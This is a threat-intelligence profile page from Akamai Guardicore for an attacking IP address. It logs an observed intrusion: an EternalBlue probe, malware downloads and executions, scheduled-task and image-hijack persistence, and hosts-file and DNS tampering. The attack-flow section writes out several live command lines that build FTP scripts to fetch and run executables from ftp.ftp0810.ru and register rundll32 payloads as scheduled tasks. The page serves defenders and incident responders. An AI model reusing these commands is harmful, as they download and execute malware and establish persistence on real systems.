Akamai Guardicore Segmentation CTI

Threat Information

Role	Attacker, Scanner
Services Targeted	MSSQL SMB
Tags	Access Suspicious Domain Access Violation CMD SMB Null Session Login SMB Persistency - Logon File Operation By CMD DNS Poisoning IDS - A Network Trojan was detected WMI Persistence Scheduled Task Creation System File Modification Service Creation Download File Service Start Download and Execute Persistency - Image Hijack Cookie Hijacking Service Configuration Outgoing Connection HTTP
Associated Attack Servers	45.58.135.106 70.39.123.18

Basic Information

IP Address	124.43.129.107
Domain	-
ISP	Sri Lanka Telecom
Country	Sri Lanka
WHOIS	Created Date	-
	Updated Date	-
	Organization	-

First seen in Akamai Guardicore Segmentation	2019-10-03
Last seen in Akamai Guardicore Segmentation	2021-02-15

What is Akamai Guardicore Segmentation
Akamai Guardicore Segmentation is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Akamai Guardicore Segmentation generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

IDS detected A Network Trojan was detected : ETERNALBLUE Probe Vulnerable System Response MS17-010	IDS - A Network Trojan was detected
c:\windows\system32\services.exe installed and started cmd as a service named vcxQ under service group None	Service Start Service Creation
Process c:\windows\system32\regsvr32.exe generated outgoing network traffic to: 139.5.177.32:8032, 173.208.153.130:8130 and 70.39.123.18:8018	Outgoing Connection
System file C:\WINDOWS\Temp\wmi.bat was modified 9 times	System File Modification
System file C:\windows\Temp\u.exe was modified 9 times	System File Modification
System file c:\windows\debug\item.dat was modified 4 times	System File Modification
Process c:\windows\system32\regsvr32.exe attempted to access suspicious domains: sharktech.net	Access Suspicious Domain Outgoing Connection
The file c:\windows\temp\conhoy.exe was downloaded and executed 14 times	Download and Execute
Process c:\windows\temp\conhoy.exe generated outgoing network traffic to: 103.124.105.246:80 and 104.233.207.172:8172	Outgoing Connection
Process c:\windows\temp\conhoy.exe attempted to access suspicious domains: hosteons.com	Access Suspicious Domain Outgoing Connection
C:\WINDOWS\Temp\wmi.bat was downloaded	Download File
Process c:\windows\system32\s.exe generated outgoing network traffic to: 172.83.155.170:80 and 45.58.135.106:80	Outgoing Connection
C:\WINDOWS\Temp\ntuser.dat was downloaded	Download File
The file C:\windows\Temp\u.exe was downloaded and executed	Download and Execute
Process c:\windows\temp\u.exe generated outgoing network traffic to: 172.83.155.170:80, 45.58.135.106:80 and 45.58.135.106:8888	Outgoing Connection
c:\windows\inf\aspnet\lsma12.exe was downloaded	Download File
c:\windows\system32\svchost.exe set the command line %systemroot%\system32\dumprep 0 -u to run using Persistency - Logon	Persistency - Image Hijack Persistency - Logon
The file C:\WINDOWS\system\msinfo.exe was downloaded and executed	Download and Execute
The file C:\WINDOWS\system32\wpcap.dll was downloaded and loaded by c:\windows\system\msinfo.exe	Download and Execute
The file C:\WINDOWS\system32\packet.dll was downloaded and loaded by c:\windows\system\msinfo.exe	Download and Execute
The command line cmd /c echo open ftp.ftp0810.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa.job
The command line C:\WINDOWS\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa1.job
The command line cmd /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa2.job
The command line cmd /c echo open ftp.ftp0810.ru>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa3.job
The command line C:\WINDOWS\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa was scheduled to run by modifying C:\WINDOWS\Tasks\ok.job
The command line c:\windows\inf\aspnet\lsma12.exe was scheduled to run by modifying C:\WINDOWS\Tasks\oka.job
The command line c:\windows\temp\conhoy.exe was scheduled to run by modifying C:\WINDOWS\Tasks\MicrosoftsWindowsy.job
c:\windows\system32\sc.exe set the command line ntsd -d to run using Persistency - Image Hijack	Persistency - Image Hijack Persistency - Logon
c:\windows\system32\net1.exe set the command line ntsd -d to run using Persistency - Image Hijack	Persistency - Image Hijack Persistency - Logon
c:\windows\system32\sc.exe set the command line ntsd -d to run using Persistency - Image Hijack	Persistency - Image Hijack Persistency - Logon
DNS poisoning detected, with hostname kr1s.ru , and associated IP address 127.0.0.1
DNS poisoning detected, with hostname zcop.ru , and associated IP address 127.0.0.1
DNS poisoning detected, with hostname kr1s.ru , and associated IP address 127.0.0.1
DNS poisoning detected, with hostname zcop.ru , and associated IP address 127.0.0.1
System file C:\WINDOWS\system32\drivers\etc\hosts was modified	System File Modification
System file C:\WINDOWS\system32\wbem\AutoRecover\88744D2A29102FC88ECF505DD2E984FC.mof was modified	System File Modification
The file c:\windows\debug\item.dat was downloaded and loaded by c:\windows\system32\cacls.exe	Download and Execute
Connection was closed due to user inactivity

Akamai Security Intelligence Group

Guardicore CENTRA

Cyber Threat Intelligence

Discover malicious IPs and domains with Akamai Guardicore Segmentation

Threat Information

Basic Information

Attack Flow